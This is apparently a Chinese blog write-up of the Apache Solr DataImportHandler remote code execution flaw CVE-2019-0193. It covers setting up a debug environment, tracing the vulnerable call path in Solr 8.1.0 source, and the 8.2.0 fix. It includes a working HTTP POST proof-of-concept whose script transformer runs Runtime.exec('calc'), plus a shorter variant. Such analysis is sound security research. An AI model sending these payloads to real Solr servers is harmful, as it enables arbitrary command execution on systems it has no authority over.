0%

Solr DataImportHandler RCE(CVE-2019-0193)漏洞分析

环境搭建

先到solr上下载jar和src,这里选择的版本为v8.1.0

https://archive.apache.org/dist/lucene/solr/8.1.0/solr-8.1.0.zip

https://archive.apache.org/dist/lucene/solr/8.1.0/solr-8.1.0-src.tgz

运行远程调试

1
2
3
4
anemone@ANEMONE-ASUS:/mnt/d/Store/document/all_my_work/solr/solr-8.1.0
$ cd server/ #一定要在server下运行
anemone@ANEMONE-ASUS:/mnt/d/Store/document/all_my_work/solr/solr-8.1.0/server
$ java "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=9000" -Dsolr.solr.home="../example/example-DIH/solr/" -jar start.jar --module=http

访问 http://localhost:8983/solr/ 出现控制台说明服务启动成功

复现

发送payload(注意tika是demo中存在的core,需要针对其他站点做变动)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
POST /solr/tika/dataimport HTTP/1.1
Host: 127.0.0.1:8983
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 363

command=full-import&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function func(x){
java.lang.Runtime.getRuntime().exec("calc");
}
]]></script>
<document>
<entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:func" />
</document>
</dataConfig>

能弹计算器说明payload生效。

漏洞分析

背景知识

dataimport

先了解下/solr/{core}/dataimport,该API的作用是将数据全量/增量导入到solr中,更详细解释在:

其中看到payload中需要的字段有:

  • dataSource:数据源,有以下几种类型,每种类型有自己不同的属性
    • JdbcDataSource:数据库源
    • URLDataSource:通常与XPathEntityProcessor配合使用,可以使用file://、http://、 ftp://等协议获取文本数据源
    • HttpDataSource:与URLDataSource一样,只是名字不同
    • FileDataSource:从磁盘文件获取数据源
    • FieldReaderDataSource:如果字段包含xml信息时,可以使用这个配合XPathEntityProcessor 使用
    • ContentStreamDataSource:使用post数据作为数据源,可与任何EntityProcessor配合使用
  • Entity:实体,相当于将数据源的操作的数据封装成一个Java对象,字段就对应对象属性,对于xml/http数据源的实体可以在默认属性之上具有以下属性:
    • url(必须):用于调用REST API的URL。(可以模板化)。如果数据源是文件,则它必须是文件位置
    • processor(必须):值必须是 “XPathEntityProcessor”
    • forEach(必须):划分记录的xpath表达式。如果有多种类型的记录用“|”(管道)分隔它们。如果 useSolrAddSchema设置为’true’,则可以省略
    • stream (可选):如果xml非常大,则将此值设置为true

ScriptTransformer

从datasource变为entity存在转换(Transform),而dataconfig中可以使用javascript写转化逻辑,例如官网中给的例子

1
2
3
4
5
6
7
8
9
10
11
12
13
<dataConfig>
<script><![CDATA[
function f1(row) {
row.put('message', 'Hello World!');
return row;
}
]]></script>
<document>
<entity name="e" pk="id" transformer="script:f1" query="select * from X">
....
</entity>
</document>
</dataConfig>

这也是造成本次rce的sink点了。

Nashorn 解析

<script>标签中,定义了js脚本,其背后是通过Nashorn做解析的,具体来说,其可以使用js语法,引用java中的对象,例如:

1
2
3
4
var MyJavaClass = Java.type(`my.package.MyJavaClass`);

var result = MyJavaClass.sayHello('Nashorn');
print(result);

静态分析入口点

先拖下对应版本的源代码(https://archive.apache.org/dist/lucene/solr/8.1.0/solr-8.1.0-src.tgz)

/solr/{core}/dataimport的入口,在server/solr-webapp/webapp/WEB-INF/web.xml看filter:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<!-- Any path (name) registered in solrconfig.xml will be sent to that filter -->
<filter>
<filter-name>SolrRequestFilter</filter-name>
<filter-class>org.apache.solr.servlet.SolrDispatchFilter</filter-class>
<!--
Exclude patterns is a list of directories that would be short circuited by the
SolrDispatchFilter. It includes all Admin UI related static content.
NOTE: It is NOT a pattern but only matches the start of the HTTP ServletPath.
-->
<init-param>
<param-name>excludePatterns</param-name>
<param-value>/partials/.+,/libs/.+,/css/.+,/js/.+,/img/.+,/templates/.+</param-value>
</init-param>
</filter>

<filter-mapping>
<filter-name>SolrRequestFilter</filter-name>
<url-pattern>/*</url-pattern>
</filter-mapping>

所有的url通过org.apache.solr.servlet.SolrDispatchFilter处理,在这个类里面调试doFilter()方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
public void doFilter(ServletRequest _request, ServletResponse _response, FilterChain chain, boolean retry) throws IOException, ServletException {
if (!(_request instanceof HttpServletRequest)) return;
HttpServletRequest request = closeShield((HttpServletRequest)_request, retry);
HttpServletResponse response = closeShield((HttpServletResponse)_response, retry);

try {
if (cores == null || cores.isShutDown()) {/*...*/}
// No need to even create the HttpSolrCall object if this path is excluded.
if (excludePatterns != null) {/*...*/}
AtomicReference<HttpServletRequest> wrappedRequest = new AtomicReference<>();
// the response and status code have already been sent
if (!authenticateRequest(request, response, wrappedRequest)) {return;}
if (wrappedRequest.get() != null) {/*...*/}
// Authentication
if (cores.getAuthenticationPlugin() != null) {/*...*/}
// Entry
HttpSolrCall call = getHttpSolrCall(request, response, retry);
ExecutorUtil.setServerThreadFlag(Boolean.TRUE);
try {
Action result = call.call();
switch (result) {/*...*/}
} finally {/*...*/}
} finally {/*...*/}
}

关键代码在17-20行,首先根据request找到HttpSolrCall对象,再调用HttpSolrCal#call()方法获取返回值。

那么跟到org.apache.solr.servlet.HttpSolrCall#call()看下…

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
public Action call() throws IOException {
/*...*/

if (cores == null) {/*...*/}
if (solrDispatchFilter.abortErrorMessage != null){/*...*/}

try {
init();
/*...*/
HttpServletResponse resp = response;
switch (action) {
case ADMIN:
handleAdminRequest();
return RETURN;
case REMOTEQUERY:
SolrRequestInfo.setRequestInfo(new SolrRequestInfo(req, new SolrQueryResponse()));
remoteQuery(coreUrl + path, resp);
return RETURN;
case PROCESS:
final Method reqMethod = Method.getMethod(req.getMethod());
HttpCacheHeaderUtil.setCacheControlHeader(config, resp, reqMethod);
// unless we have been explicitly told not to, do cache validation
// if we fail cache validation, execute the query
if (config.getHttpCachingConfig().isNever304() ||
!HttpCacheHeaderUtil.doCacheHeaderValidation(solrReq, req, reqMethod, resp)) {
SolrQueryResponse solrRsp = new SolrQueryResponse();
SolrRequestInfo.setRequestInfo(new SolrRequestInfo(solrReq, solrRsp));
execute(solrRsp);
/*...*/
writeResponse(solrRsp, responseWriter, reqMethod);
}
return RETURN;
default: return action;
}
} catch (Throwable ex) {
if (shouldAudit(EventType.ERROR)) {
cores.getAuditLoggerPlugin().doAudit(new AuditEvent(EventType.ERROR, ex, req));
}
sendError(ex);
// walk the the entire cause chain to search for an Error
Throwable t = ex;
while (t != null) {
if (t instanceof Error) {/*...*/}
}

动态调试

找入口点

实在看不下去了,根本不知道走哪个case,还是动态调试吧,之前已经用jwdp起了项目,现在把solr源码下下来,用IDEA起一个项目,然后加distserver/lib目录到library里,用RemoteDebug下断点调试就行了。

image-20191103160037181

访问那个api后,调试发现走的是PROCESS的case:

image-20191103161357607

继续向下看到图中542行:org.apache.solr.servlet.HttpSolrCall#execute(),跟进去:

1
2
3
4
protected void execute(SolrQueryResponse rsp) {
solrReq.getContext().put("webapp", req.getContextPath());
solrReq.getCore().execute(handler, solrReq, rsp);
}

获取到SolrCore,执行其org.apache.solr.core.SolrCore#execute()方法,该方法会调用handler.handleRequest(req,rsp)对req做处理:

image-20191103162039712

handler.handleRequest(req,rsp)中会调用org.apache.solr.handler.RequestHandlerBase#handleRequestBody()方法,如果是之前能静态分析到这里,可以像Chamd5的大佬一样,搜索该类的实现,发现dataimport.DataImportHandler#handleRequestBody()这个方法,但是现在既然已经动态调试了,那直接跟进去就行了。

至此,我们终于找到了处理该请求的入口。

调用栈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
public void handleRequestBody(SolrQueryRequest req, SolrQueryResponse rsp)
throws Exception {
rsp.setHttpCaching(false);

// TODO: figure out why just the first one is OK...
// ...
SolrParams params = req.getParams();
NamedList defaultParams = (NamedList) initArgs.get("defaults");
RequestInfo requestParams = new RequestInfo(req, getParamsMap(params), contentStream);
String command = requestParams.getCommand();
if (DataImporter.SHOW_CONF_CMD.equals(command)) {/*...*/}

if (command != null && DataImporter.ABORT_CMD.equals(command)) {
importer.runCmd(requestParams, null);
} else if (importer.isBusy()) {/*...*/
} else if (command != null) {
// RCE
if (DataImporter.FULL_IMPORT_CMD.equals(command)
|| DataImporter.DELTA_IMPORT_CMD.equals(command) ||
IMPORT_CMD.equals(command)) {
importer.maybeReloadConfiguration(requestParams, defaultParams);
// 获取一个SolrWriter
DIHWriter sw = getSolrWriter(processor, loader, requestParams, req);

if (requestParams.isDebug()) {
if (debugEnabled) {
// Synchronous request for the debug mode
importer.runCmd(requestParams, sw);
//...
} else {/*...*/}
} else {
// Asynchronous request for normal mode
if(requestParams.getContentStream() == null && !requestParams.isSyncMode()){
importer.runAsync(requestParams, sw);
} else {
importer.runCmd(requestParams, sw);
}
}
} else if (DataImporter.RELOAD_CONF_CMD.equals(command)) {/*...*/}
}
rsp.add("status", importer.isBusy() ? "busy" : "idle");
rsp.add("importResponse", message);
rsp.add("statusMessages", importer.getStatusMessages());
}

首先会提取出request的参数,然后关键在第18-39行,如果是调试模式(requestParams.isDebug()),则同步执行importer,如果不是则异步执行,为了方便调试,可以把payload加一个debug=true参数,调试同步的分支:

image-20191103165424861

继续向下跟,DataImporter#runCmd()调用DataImporter#doFullImport()——因为我们参数是command=full-import

1
2
3
4
5
6
7
8
9
10
11
12
13
public void doFullImport(DIHWriter writer, RequestInfo requestParams) {
log.info("Starting Full Import");
setStatus(Status.RUNNING_FULL_DUMP);
try {
DIHProperties dihPropWriter = createPropertyWriter();
setIndexStartTime(dihPropWriter.getCurrentTimestamp());
docBuilder = new DocBuilder(this, writer, dihPropWriter, requestParams);
checkWritablePersistFile(writer, dihPropWriter);
docBuilder.execute();
if (!requestParams.isDebug())
cumulativeStatistics.add(docBuilder.importStatistics);
} catch (Exception e) {/*...*/}
}

看到这里大概就可以猜到问题在第9行——docBuilder.execute()了,导入的dataConfig时我们可以控制的,而config中可以自写js脚本,又想到Nashorn解析的js脚本能执行java命令,这就导致了本次的漏洞。

跟完后续的调用栈吧,sink点在ScriptTransformer#initEngine()的87行——ScriptEngine#eval(String)

1
2
3
4
5
6
7
8
9
10
org.apache.solr.handler.dataimport.DocBuilder#doFullDump
DocBuilder#buildDocument(VariableResolver, DocWrapper, Map<String,Object>, EntityProcessorWrapper, boolean, ContextImpl)
DocBuilder#buildDocument(VariableResolver, DocWrapper, Map<String,Object>, EntityProcessorWrapper, boolean, ContextImpl, List<EntityProcessorWrapper>):L476
EntityProcessorWrapper#nextRow:L280
EntityProcessorWrapper#loadTransformers // 主力里面的第100-111行,如果发现script标签,则向transformers加入解析js的transformer
EntityProcessorWrapper#applyTransformer:L222
ScriptTransformer#transformRow:L52
ScriptTransformer#initEngine:L87
ScriptEngine#eval(String) //这里的string就是之前script里的内容
javax.script.Invocable#invokeFunction//这里调用之前func定义的内容,产生RCE

值得注意的是,我们可以直接在ScriptEngine#eval(String)处就直接RCE,即将script直接换成如下

1
<script><![CDATA[java.lang.Runtime.getRuntime().exec("calc");]]></script>

但是这样程序日志会有报错,因为invokeFunction找不到,综上本文还是选择了定义函数的payload。

影响范围和修复

此漏洞影响solr<=8.1.1,对比8.2.0可以看到修复方案:

image-20191103202031725

即dataConfig参数必须要dataConfigParam_enabled为True时才能使用,可以在配置或启动命令中设置-Denable .dih.dataConfigParam=true

image-20191103202135491

总结

8月份的一个洞了,一直忙到现在才看,本身漏洞不复杂,但其中附加调试和找javaWeb入口点的技巧值得学习。

相关链接